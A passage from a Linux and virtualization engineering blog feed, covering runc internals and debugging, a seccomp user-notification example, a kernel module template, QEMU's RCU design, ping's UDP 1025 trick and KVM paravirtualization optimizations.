s.Pid = unix.Getpid()
s.Status = specs.StateCreated
if err := l.config.Config.Hooks[configs.StartContainer].RunHooks(s); err != nil {
return err
}
return system.Exec(name, l.config.Args[0:], os.Environ())
}
</code></pre></div></div>
<p>For now, we can the runc process is ./runc init.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/go/src# ps aux | grep runc
root 4239 0.0 0.2 1090192 10400 ? Ssl Dec26 0:00 ./runc init
root 10667 0.0 0.0 14432 1084 pts/0 S+ 05:19 0:00 grep --color=auto runc
root@ubuntu:~/go/src# cat /proc/4239/comm
runc:[2:INIT]
root@ubuntu:/run/runc/test# runc list
ID PID STATUS BUNDLE CREATED OWNER
test 4239 created /home/test/mycontainer 2021-12-25T05:17:30.596712553Z root
</code></pre></div></div>
<p>Now let’s execute ‘runc start test’. We can see following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/run/runc/test# runc start test
root@ubuntu:/run/runc/test# runc list
ID PID STATUS BUNDLE CREATED OWNER
test 4239 running /home/test/mycontainer 2021-12-25T05:17:30.596712553Z root
root@ubuntu:/run/runc/test# runc ps test
UID PID PPID C STIME TTY TIME CMD
root 4239 2709 0 Dec26 ? 00:00:00 sleep 1000
root@ubuntu:/run/runc/test# ls
state.json
</code></pre></div></div>
<p>The ‘runc start’ will call ‘getContainer’ to get a container object and call the ‘Exec()’ of container which calls exec().</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) exec() error {
path := filepath.Join(c.root, execFifoFilename)
pid := c.initProcess.pid()
blockingFifoOpenCh := awaitFifoOpen(path)
for {
select {
case result := <-blockingFifoOpenCh:
return handleFifoResult(result)
case <-time.After(time.Millisecond * 100):
stat, err := system.Stat(pid)
if err != nil || stat.State == system.Zombie {
// could be because process started, ran, and completed between our 100ms timeout and our system.Stat() check.
// see if the fifo exists and has data (with a non-blocking open, which will succeed if the writing process is complete).
if err := handleFifoResult(fifoOpen(path, false)); err != nil {
return errors.New("container process is already dead")
}
return nil
}
}
}
}
</code></pre></div></div>
<p>The ‘handleFifoResult’ read data from the execfife pipe thus unblock the ‘runc:[2:INIT]’ process and finally the ‘runc:[2:INIT]’ will execute the process defined in config.json.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func handleFifoResult(result openResult) error {
if result.err != nil {
return result.err
}
f := result.file
defer f.Close()
if err := readFromExecFifo(f); err != nil {
return err
}
return os.Remove(f.Name())
}
</code></pre></div></div>
runc internals, part 1: usage, build and source architecture2021-12-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/22/runc-internals-1
<p><a href="https://github.com/opencontainers/runc">runc</a> is the foundation of container technology. The idea of container is simple, put some process into a separate namespace and use cgroups to restrict these process’ resource usage and use overlayfs as filesystem for container. So it seems that the runc’s work is easy, just prepare the environment for container process and run it. In reality, it is not so easy. This serials will try to do a deep analysis of runc’s internal. This is the first part, how to use and build runc and the runc’s source code architecture.</p>
<h3> install Go </h3>
<p>Download Go binary from <a href="https://go.dev/dl/">here</a>, we uses ‘go1.17.5.linux-amd64.tar.gz’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> wget https://go.dev/dl/go1.17.5.linux-amd64.tar.gz
</code></pre></div></div>
<p>Decompress it to /usr/local binary:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> tar -C /usr/local -xzf go1.17.5.linux-amd64.tar.gz
</code></pre></div></div>
<p>And go binary to $PATH and set the GOPATH and GOROOT directory, add following lines to ~/.profile</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> export PATH=/usr/local/go/bin:$PATH
export GOROOT=/usr/local/go
export GOPATH=/home/test/go
</code></pre></div></div>
<p>Enable the setting:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> source ~/.profile
mkdir /home/test/go/bin
mkdir /home/test/go/src
mkdir /home/test/go/src
</code></pre></div></div>
<h3> build runc </h3>
<p>As the , first README.md of runc, install libseccomp-dev pkg:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt install libseccomp-dev
</code></pre></div></div>
<p>clone runc:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mkdir /home/test/go/src/github.com/opencontainers
cd /home/test/go/src/github.com/opencontainers
git clone https://github.com/opencontainers/runc
cd runc
</code></pre></div></div>
<p>Change the runc Makefile following two lines, add <b>-gcflags “-N -l”</b>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> GO_BUILD := $(GO) build -trimpath $(GO_BUILDMODE) $(EXTRA_FLAGS) -tags "$(BUILDTAGS)" \
-ldflags "-X main.gitCommit=$(COMMIT) -X main.version=$(VERSION) $(EXTRA_LDFLAGS)" -gcflags "-N -l"
GO_BUILD_STATIC := CGO_ENABLED=1 $(GO) build -trimpath $(EXTRA_FLAGS) -tags "$(BUILDTAGS) netgo osusergo" \
-ldflags "-extldflags -static -X main.gitCommit=$(COMMIT) -X main.version=$(VERSION) $(EXTRA_LDFLAGS)" -gcflags "-N -l"
</code></pre></div></div>
<p>build runc</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> make
make install
</code></pre></div></div>
<h3> runc usage </h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # create the top most bundle directory
mkdir /mycontainer
cd /mycontainer
# create the rootfs directory
mkdir rootfs
# export busybox via Docker into the rootfs directory
docker export $(docker create busybox) | tar -C rootfs -xvf -
runc spec
runc run test
</code></pre></div></div>
<p>Now we run a container.</p>
<p>Let’s debug runc. In order to let the runc find the source directory ‘github.com/opencontainers/runc/’, I copy ‘runc’ binary to ‘/home/test/go/src’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/go/src# gdb --args ./runc run --bundle /home/test/mycontainer/ test
...
(gdb) b main.startContainer
Breakpoint 1 at 0x60d100: file github.com/opencontainers/runc/utils_linux.go, line 374.
(gdb) r
Starting program: /home/test/go/src/runc run --bundle /home/test/mycontainer/ test
....
Thread 1 "runc" hit Breakpoint 1, main.startContainer (context=0xc000144840, action=2 '\002', criuOpts=0x0, ~r3=824635577192, ~r4=...)
at github.com/opencontainers/runc/utils_linux.go:374
374 func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
(gdb) n
375 if err := revisePidFile(context); err != nil {
(gdb) n
378 spec, err := setupSpec(context)
(gdb) n
379 if err != nil {
(gdb) p spec
$1 = (github.com/opencontainers/runtime-spec/specs-go.Spec *) 0xc000170380
(gdb) p *spec
$2 = {Version = 0xc0002067f0 "1.0.2-dev", Process = 0xc00020c000, Root = 0xc000127e90, Hostname = 0xc0002068b8 "runc", Mounts = {array = 0xc000184580,
len = 7, cap = 9}, Hooks = 0x0, Annotations = 0x0, Linux = 0xc00020c0f0, Solaris = 0x0, Windows = 0x0, VM = 0x0}
(gdb) p *spec.Process
$3 = {Terminal = true, ConsoleSize = 0x0, User = {UID = 0, GID = 0, Umask = 0x0, AdditionalGids = {array = 0x0, len = 0, cap = 0}, Username = 0x0 ""},
Args = {array = 0xc000149440, len = 1, cap = 4}, CommandLine = 0x0 "", Env = {array = 0xc000149480, len = 2, cap = 4}, Cwd = 0x5555561ba178 "/",
Capabilities = 0xc000170400, Rlimits = {array = 0xc000170480, len = 1, cap = 4}, NoNewPrivileges = true, ApparmorProfile = 0x0 "", OOMScoreAdj = 0x0,
SelinuxLabel = 0x0 ""}
(gdb)
</code></pre></div></div>
<h3> runc source architecture </h3>
<p>Following shows the source code architecture of runc</p>
<p><img src="/assets/img/runcinternals1/1.png" alt="" /></p>
<p>The runc binary has several subcommands, every handler is in the go file of root directory. The core code of runc is the libcontainer directory. In the next post I will analysis the runc create and start command.</p>
<h3> reference </h3>
<p><a href="https://yacanliu.gitee.io/runc-1.html">探索 runC (上)</a></p>
seccomp user notification2021-05-20T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/05/20/seccomp-user-notify
<p>seccomp user notification defers the seccomp decisions to userspace. This post <a href="https://brauner.github.io/2020/07/23/seccomp-notify.html">Seccomp Notify</a> has a very detail description of this feature. The <a href="https://man7.org/tlpi/code/online/dist/seccomp/seccomp_user_notification.c.html">page</a> has an example of seccomp. I change this example to following: seccomp BPF will forward the listen syscall’s decision to userspace. And the tracer will print the listen port and can block the specified port to be listenend. Just a poc and the program doesn’t exit normally.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _GNU_SOURCE
#include <sys/types.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <limits.h>
#include <signal.h>
#include <sys/wait.h>
#include <stddef.h>
#include <stdbool.h>
#include <linux/audit.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netinet/in.h>
#include "scm_functions.h"
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
static int
seccomp(unsigned int operation, unsigned int flags, void *args)
{
return syscall(__NR_seccomp, operation, flags, args);
}
static int
pidfd_getfd(int pidfd, int targetfd, unsigned int flags)
{
return syscall(438, pidfd, targetfd, flags);
}
static int
pidfd_open(pid_t pid, unsigned int flags)
{
return syscall(__NR_pidfd_open, pid, flags);
}
#define X32_SYSCALL_BIT 0x40000000
#define X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR \
BPF_STMT(BPF_LD | BPF_W | BPF_ABS, \
(offsetof(struct seccomp_data, arch))), \
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 2), \
BPF_STMT(BPF_LD | BPF_W | BPF_ABS, \
(offsetof(struct seccomp_data, nr))), \
BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, X32_SYSCALL_BIT, 0, 1), \
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS)
static int
installNotifyFilter(void)
{
struct sock_filter filter[] = {
X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR,
/* mkdir() triggers notification to user-space tracer */
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_listen, 0, 1),
BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_USER_NOTIF),
/* Every other system call is allowed */
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};
struct sock_fprog prog = {
.len = (unsigned short) (sizeof(filter) / sizeof(filter[0])),
.filter = filter,
};
int notifyFd = seccomp(SECCOMP_SET_MODE_FILTER,
SECCOMP_FILTER_FLAG_NEW_LISTENER, &prog);
if (notifyFd == -1)
errExit("seccomp-install-notify-filter");
return notifyFd;
}
static void
closeSocketPair(int sockPair[2])
{
if (close(sockPair[0]) == -1)
errExit("closeSocketPair-close-0");
if (close(sockPair[1]) == -1)
errExit("closeSocketPair-close-1");
}
static pid_t
targetProcess(int sockPair[2], char *argv[])
{
pid_t targetPid;
int notifyFd;
struct sigaction sa;
int s;
int sockfd;
struct sockaddr_in sockaddr;
targetPid = fork();
if (targetPid == -1)
errExit("fork");
if (targetPid > 0) /* In parent, return PID of child */
return targetPid;
printf("Target process: PID = %ld\n", (long) getpid());
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
errExit("prctl");
notifyFd = installNotifyFilter();
if (sendfd(sockPair[0], notifyFd) == -1)
errExit("sendfd");
if (close(notifyFd) == -1)
errExit("close-target-notify-fd");
closeSocketPair(sockPair);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
sockaddr.sin_family = AF_INET;
sockaddr.sin_addr.s_addr = htonl(INADDR_ANY);
sockaddr.sin_port = htons(80);
if (bind(sockfd, (struct sockaddr*)&sockaddr, sizeof(sockaddr)))
errExit("Target process: bind error");
if (listen(sockfd, 1024))
errExit("Target process: listen error");
printf("listen success\n");
}
static void
checkNotificationIdIsValid(int notifyFd, __u64 id, char *tag)
{
if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_ID_VALID, &id) == -1) {
fprintf(stderr, "Tracer: notification ID check (%s): "
"target has died!!!!!!!!!!!\n", tag);
}
}
/* Handle notifications that arrive via SECCOMP_RET_USER_NOTIF file
descriptor, 'notifyFd'. */
static void
watchForNotifications(int notifyFd)
{
struct seccomp_notif *req;
struct seccomp_notif_resp *resp;
struct seccomp_notif_sizes sizes;
char path[PATH_MAX];
int procMem; /* FD for /proc/PID/mem of target process */
int pidfd;
int listennum;
int listenfd;
struct sockaddr_in sa;
int salen = sizeof(sa);
if (seccomp(SECCOMP_GET_NOTIF_SIZES, 0, &sizes) == -1)
errExit("Tracer: seccomp-SECCOMP_GET_NOTIF_SIZES");
req = malloc(sizes.seccomp_notif);
if (req == NULL)
errExit("Tracer: malloc");
resp = malloc(sizes.seccomp_notif_resp);
if (resp == NULL)
errExit("Tracer: malloc");
/* Loop handling notifications */
for (;;) {
/* Wait for next notification, returning info in '*req' */
if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_RECV, req) == -1)
errExit("Tracer: ioctlSECCOMP_IOCTL_NOTIF_RECV");
printf("Tracer: got notification for PID %d; ID is %llx\n",
req->pid, req->id);
pidfd = pidfd_open(req->pid, 0);
listennum = req->data.args[0];
listenfd = pidfd_getfd(pidfd, listennum, 0);
getsockname(listenfd, &sa, &salen);
printf("Tracer: listen %d port\n", ntohs(sa.sin_port));
resp->id = req->id;
resp->flags = SECCOMP_USER_NOTIF_FLAG_CONTINUE;
resp->error = 0;
resp->val = 0;
if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_SEND, resp) == -1) {
if (errno == ENOENT)
printf("Tracer: response failed with ENOENT; perhaps target "
"process's syscall was interrupted by signal?\n");
else
perror("ioctl-SECCOMP_IOCTL_NOTIF_SEND");
}
}
}
static pid_t
tracerProcess(int sockPair[2])
{
pid_t tracerPid;
tracerPid = fork();
if (tracerPid == -1)
errExit("fork");
if (tracerPid > 0) /* In parent, return PID of child */
return tracerPid;
/* Child falls through to here */
printf("Tracer: PID = %ld\n", (long) getpid());
/* Receive the notification file descriptor from the target process */
int notifyFd = recvfd(sockPair[1]);
if (notifyFd == -1)
errExit("recvfd");
closeSocketPair(sockPair); /* We no longer need the socket pair */
/* Handle notifications */
watchForNotifications(notifyFd);
exit(EXIT_SUCCESS); /* NOTREACHED */
}
int main(int argc, char *argv[])
{
pid_t targetPid, tracerPid;
int sockPair[2];
setbuf(stdout, NULL);
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockPair) == -1)
errExit("socketpair");
targetPid = targetProcess(sockPair, &argv[optind]);
tracerPid = tracerProcess(sockPair);
closeSocketPair(sockPair);
waitpid(targetPid, NULL, 0);
printf("Parent: target process has terminated\n");
waitpid(tracerPid, NULL, 0);
exit(EXIT_SUCCESS);
}
</code></pre></div></div>
hello world driver2021-05-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/05/12/hello-driver
<p>After several years kernel development, I still can’t remember the templeate of driver. So I write this post.</p>
<h3> Ubuntu </h3>
<p>Install kernel header.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt install linux-headers-`uname -r`
</code></pre></div></div>
<p>hello.c</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <linux/module.h>
#include <linux/init.h>
MODULE_LICENSE("GPL");
static int hello_init(void)
{
printk("Hello word\n");
return 0;
}
static void hello_exit(void)
{
printk("Goodbye,Hello word\n");
}
module_init(hello_init);
module_exit(hello_exit);
</code></pre></div></div>
<p>Makefile</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> obj-m+=hello.o
all:
make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) modules
clean:
make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) clean
</code></pre></div></div>
<h3> redhat </h3>
<p>yum install kernel-devel-<code class="language-plaintext highlighter-rouge">uname -r</code></p>
QEMU RCU implementation2021-03-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/03/14/qemu-rcu
<p>RCU is a synchronization mechanism that firstly used in Linux kernel. Now there is also a userspace RCU implementation library called liburcu. In general, RCU is used to protect read-mostly data structures.
This post is about how qemu implements RCU.</p>
<h3> Overview </h3>
<p>QEMU rcu is ported from liburcu. librcu has various version, for least invasive QEMU chose the urcu-mb implementation.</p>
<p>QEMU RCU core has a global counter named ‘rcu_gp_ctr’ which is used by both readers and updaters.
Every thread has a thread local variable of ‘ctr’ counter in ‘rcu_reader_data’ struct.</p>
<p>The updater will updates this counter in ‘synchronize_rcu’ to indicate a new of the resource.
The reader will copy ‘rcu_gp_ctr’ to his own ‘ctr’ varaible when calling ‘rcu_read_lock’.</p>
<p>When the ‘synchronize_rcu’ find that the readers’ ‘ctr’ is not the same as the ‘rcu_gp_ctr’ it will set the ‘rcu_reader_data->waiting’ bool variable, and when the ‘rcu_read_unlock’ finds this bool variable is set it will trigger a event thus notify the ‘synchronize_rcu’ that it leaves the critical section. Following shows the idea of QEMU RCU.</p>
<p><img src="/assets/img/qemurcu/1.png" alt="" /></p>
<p>‘rcu_reader_data’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct rcu_reader_data {
/* Data used by both reader and synchronize_rcu() */
unsigned long ctr;
bool waiting;
/* Data used by reader only */
unsigned depth;
/* Data used for registry, protected by rcu_registry_lock */
QLIST_ENTRY(rcu_reader_data) node;
};
</code></pre></div></div>
<h3> Initialization </h3>
<p>Every thread that uses RCU need to call ‘rcu_register_thread’ to insert the thread local variable ‘rcu_reader’ to the global registry list.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void rcu_register_thread(void)
{
assert(rcu_reader.ctr == 0);
qemu_mutex_lock(&rcu_registry_lock);
QLIST_INSERT_HEAD(&registry, &rcu_reader, node);
qemu_mutex_unlock(&rcu_registry_lock);
}
</code></pre></div></div>
<h3> Read side </h3>
<p>‘rcu_read_lock’ is used by the reader. The ‘rcu_reader->depth’ is used for nested lock case. Here we can see it copies the ‘rcu_gp_ctr’ to the ‘rcu_reader->ctr’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void rcu_read_lock(void)
{
struct rcu_reader_data *p_rcu_reader = &rcu_reader;
unsigned ctr;
if (p_rcu_reader->depth++ > 0) {
return;
}
ctr = qatomic_read(&rcu_gp_ctr);
qatomic_set(&p_rcu_reader->ctr, ctr);
/* Write p_rcu_reader->ctr before reading RCU-protected pointers. */
smp_mb_placeholder();
}
</code></pre></div></div>
<p>‘rcu_read_unlock’ is used by the reader when leaves the critical section. It reset ‘rcu_reader->ctr’ to 0 and if it finds ‘rcu_reader->waiting’ is set, it will set the ‘rcu_gp_event’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void rcu_read_unlock(void)
{
struct rcu_reader_data *p_rcu_reader = &rcu_reader;
assert(p_rcu_reader->depth != 0);
if (--p_rcu_reader->depth > 0) {
return;
}
/* Ensure that the critical section is seen to precede the
* store to p_rcu_reader->ctr. Together with the following
* smp_mb_placeholder(), this ensures writes to p_rcu_reader->ctr
* are sequentially consistent.
*/
qatomic_store_release(&p_rcu_reader->ctr, 0);
/* Write p_rcu_reader->ctr before reading p_rcu_reader->waiting. */
smp_mb_placeholder();
if (unlikely(qatomic_read(&p_rcu_reader->waiting))) {
qatomic_set(&p_rcu_reader->waiting, false);
qemu_event_set(&rcu_gp_event);
}
}
</code></pre></div></div>
<h3> Write side </h3>
<p>The updater will call ‘call_rcu’ which will insert a node to the RCU thread queue. And the thread function ‘call_rcu_thread’ will process this queue and it will call ‘synchronize_rcu’. For the most case, it will add ‘rcu_gp_ctr’ and call ‘wait_for_readers’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void synchronize_rcu(void)
{
QEMU_LOCK_GUARD(&rcu_sync_lock);
/* Write RCU-protected pointers before reading p_rcu_reader->ctr.
* Pairs with smp_mb_placeholder() in rcu_read_lock().
*/
smp_mb_global();
QEMU_LOCK_GUARD(&rcu_registry_lock);
if (!QLIST_EMPTY(&registry)) {
/* In either case, the qatomic_mb_set below blocks stores that free
* old RCU-protected pointers.
*/
if (sizeof(rcu_gp_ctr) < 8) {
...
} else {
/* Increment current grace period. */
qatomic_mb_set(&rcu_gp_ctr, rcu_gp_ctr + RCU_GP_CTR);
}
wait_for_readers();
}
}
</code></pre></div></div>
<p>‘rcu_gp_ongoing’ is used to check whether the there is a read in critical section. If it is, the new ‘rcu_gp_ctr’ will not be the same as the ‘rcu_reader_data->ctr’ and will set ‘rcu_reader_data->waiting’ to be true. If ‘registry’ is empty it means all readers has leaves the critical section and this means no old reader hold the old version pointer and the RCU thread can call the callback which insert to the RCU queue.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void wait_for_readers(void)
{
ThreadList qsreaders = QLIST_HEAD_INITIALIZER(qsreaders);
struct rcu_reader_data *index, *tmp;
for (;;) {
/* We want to be notified of changes made to rcu_gp_ongoing
* while we walk the list.
*/
qemu_event_reset(&rcu_gp_event);
/* Instead of using qatomic_mb_set for index->waiting, and
* qatomic_mb_read for index->ctr, memory barriers are placed
* manually since writes to different threads are independent.
* qemu_event_reset has acquire semantics, so no memory barrier
* is needed here.
*/
QLIST_FOREACH(index, &registry, node) {
qatomic_set(&index->waiting, true);
}
/* Here, order the stores to index->waiting before the loads of
* index->ctr. Pairs with smp_mb_placeholder() in rcu_read_unlock(),
* ensuring that the loads of index->ctr are sequentially consistent.
*/
smp_mb_global();
QLIST_FOREACH_SAFE(index, &registry, node, tmp) {
if (!rcu_gp_ongoing(&index->ctr)) {
QLIST_REMOVE(index, node);
QLIST_INSERT_HEAD(&qsreaders, index, node);
/* No need for mb_set here, worst of all we
* get some extra futex wakeups.
*/
qatomic_set(&index->waiting, false);
}
}
if (QLIST_EMPTY(&registry)) {
break;
}
/* Wait for one thread to report a quiescent state and try again.
* Release rcu_registry_lock, so rcu_(un)register_thread() doesn't
* wait too much time.
*
* rcu_register_thread() may add nodes to &registry; it will not
* wake up synchronize_rcu, but that is okay because at least another
* thread must exit its RCU read-side critical section before
* synchronize_rcu is done. The next iteration of the loop will
* move the new thread's rcu_reader from &registry to &qsreaders,
* because rcu_gp_ongoing() will return false.
*
* rcu_unregister_thread() may remove nodes from &qsreaders instead
* of &registry if it runs during qemu_event_wait. That's okay;
* the node then will not be added back to &registry by QLIST_SWAP
* below. The invariant is that the node is part of one list when
* rcu_registry_lock is released.
*/
qemu_mutex_unlock(&rcu_registry_lock);
qemu_event_wait(&rcu_gp_event);
qemu_mutex_lock(&rcu_registry_lock);
}
/* put back the reader list in the registry */
QLIST_SWAP(&registry, &qsreaders, node);
}
static inline int rcu_gp_ongoing(unsigned long *ctr)
{
unsigned long v;
v = qatomic_read(ctr);
return v && (v != rcu_gp_ctr);
}
</code></pre></div></div>
Why ping uses UDP port 10252021-02-19T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/02/19/ping-1025
<p>Recently I noticed that the ping source code has an interesting trick.
It creates a UDP socket and bind connect to the destnation using port 1025. The code is <a href="https://github.com/iputils/iputils/blob/master/ping/ping.c#L707">here</a>.</p>
<p>At first glance it is strange as we know the ping just uses ICMP to detect the connection of two ip.</p>
<p>So Let’s see what happened.</p>
<p>In one terminal we use tcpdump to capture the packet.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# tcpdump -nn -vv host 8.8.8.8
</code></pre></div></div>
<p>In another terminal we strace the ping.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ strace -o ping.txt ping 8.8.8.8 -c 1
</code></pre></div></div>
<p>After the ping terminated. We can see the tcmpdump has no packet related with the 1025 port.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# tcpdump -nn -vv host 8.8.8.8
tcpdump: listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
07:29:19.390097 IP (tos 0x0, ttl 64, id 9390, offset 0, flags [DF], proto ICMP (1), length 84)
192.168.80.146 > 8.8.8.8: ICMP echo request, id 2, seq 1, length 64
07:29:19.688639 IP (tos 0x0, ttl 128, id 44019, offset 0, flags [none], proto ICMP (1), length 84)
8.8.8.8 > 192.168.80.146: ICMP echo reply, id 2, seq 1, length 64
</code></pre></div></div>
<p>Let’s see the strace log.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(1025), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
getsockname(5, {sa_family=AF_INET, sin_port=htons(43043), sin_addr=inet_addr("192.168.80.146")}, [16]) = 0
close(5) = 0
</code></pre></div></div>
<p>The UDP 1025 port is just there and exists just socket/connect/getsockname/close.</p>
<p>So after search the internet I just found this is a trick to get current source IP that ping program used.</p>
<p>The use of 1025 is in the condition of no source ip specified. If we specify the source IP, there is no connect in the strace log.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ strace -o ping.txt ping -I 192.168.80.146 8.8.8.8 -c 1
</code></pre></div></div>
<p>Finally let’s just go to kernel to see.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr,
int, addrlen)
{
return __sys_connect(fd, uservaddr, addrlen);
}
__sys_connect
->__sys_connect_file
->sock->ops->connect(inet_stream_connect)
->__inet_stream_connect
->sk->sk_prot->connect(ip4_datagram_connect)
->__ip4_datagram_connect
->ip_route_connect
->ip_route_connect_init
->__ip_route_output_key
->ip_route_output_key_hash
->ip_route_output_key_hash_rcu
->flowi4_update_output
->ip_route_output_flow
</code></pre></div></div>
<p>It seems that ‘ip_route_output_key_hash_rcu’ choose the source address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ip_route_output_key_hash_rcu
if (!fl4->saddr) {
if (ipv4_is_multicast(fl4->daddr))
fl4->saddr = inet_select_addr(dev_out, 0,
fl4->flowi4_scope);
else if (!fl4->daddr)
fl4->saddr = inet_select_addr(dev_out, 0,
RT_SCOPE_HOST);
}
__ip4_datagram_connect
if (!inet->inet_saddr)
inet->inet_saddr = fl4->saddr; /* Update source address */
</code></pre></div></div>
<p>In the getsockname syscall, we can see it gets the source IP from ‘inet->inet_saddr’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int inet_getname(struct socket *sock, struct sockaddr *uaddr,
int peer)
{
struct sock *sk = sock->sk;
struct inet_sock *inet = inet_sk(sk);
DECLARE_SOCKADDR(struct sockaddr_in *, sin, uaddr);
sin->sin_family = AF_INET;
if (peer) {
...
} else {
__be32 addr = inet->inet_rcv_saddr;
if (!addr)
addr = inet->inet_saddr;
sin->sin_port = inet->inet_sport;
sin->sin_addr.s_addr = addr;
}
...
}
EXPORT_SYMBOL(inet_getname);
</code></pre></div></div>
<h3> Reference </h3>
<p>https://echorand.me/posts/my-own-ping/</p>
<p>https://jeffpar.github.io/kbarchive/kb/129/Q129065/</p>
<p>https://github.com/iputils/iputils/issues/125</p>
<p>https://stackoverflow.com/questions/25879280/getting-my-own-ip-address-by-connecting-using-udp-socket</p>
kvm performance optimization technologies, part two2020-10-01T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/10/01/kvm-performance-2
<p>In full virtualization the guest OS doesn’t aware of it is running in an VM. If the OS knows it is running in an VM it can do some optimizations to improve the performance. This is called para virtualization(pv). From a generally speaking,
Any technology used in the guest OS that it is based the assumption that it is running in a VM can be called a pv technology. For example the virtio is a para framework, and the <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/03/24/kvm-async-page-fault">apf</a> is also a para feature. However in this post, I will not talk about these more complicated feature but some more small performance optimization feature in pv.</p>
<p>One of the most important thing in VM optimization is to reduce the VM-exit as much as possible, the best is there is no VM-exit.</p>
<p>This is the second part of kvm performance optimization technoligies followin up the <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/09/10/kvm-performance-1">part one</a>. This post contains the following pv optimization:</p>
<ul>
<li>PV unhalt</li>
<li>Host/Guest halt poll</li>
<li>Disable mwait/hlt/pause</li>
<li>Exitless timer</li>
</ul>
<h3> PV unhalt </h3>
<p>Its name maybe make confusion. In fact it’s about spinlock.
In virtualization environment, the spinlock holder vcpu may be preempted by scheduler. The other vcpu which is try get the spinlock will be spinning until the holder vcpu is scheduled again which may be a quite long time.</p>
<p>The PV unhalt feature is used to set the pv_lock_ops to rewrite the native spinlock’s function so it can be more optimizated. More reference can be found in <a href="https://wiki.xen.org/wiki/Benchmarking_the_new_PV_ticketlock_implementation">here</a> and <a href="http://www.xen.org/files/xensummitboston08/LHP.pdf">here</a>.</p>
<p>Though the total implementation of pv spinlock is related with the spinlock implementation such as ticketlock and queued spinlock, the basic idea behind the pv spinlock is the same. That is instead of spining while the vcpu can’t get the spinlock it will execute halt instruction and let the other vcpu got scheduled.</p>
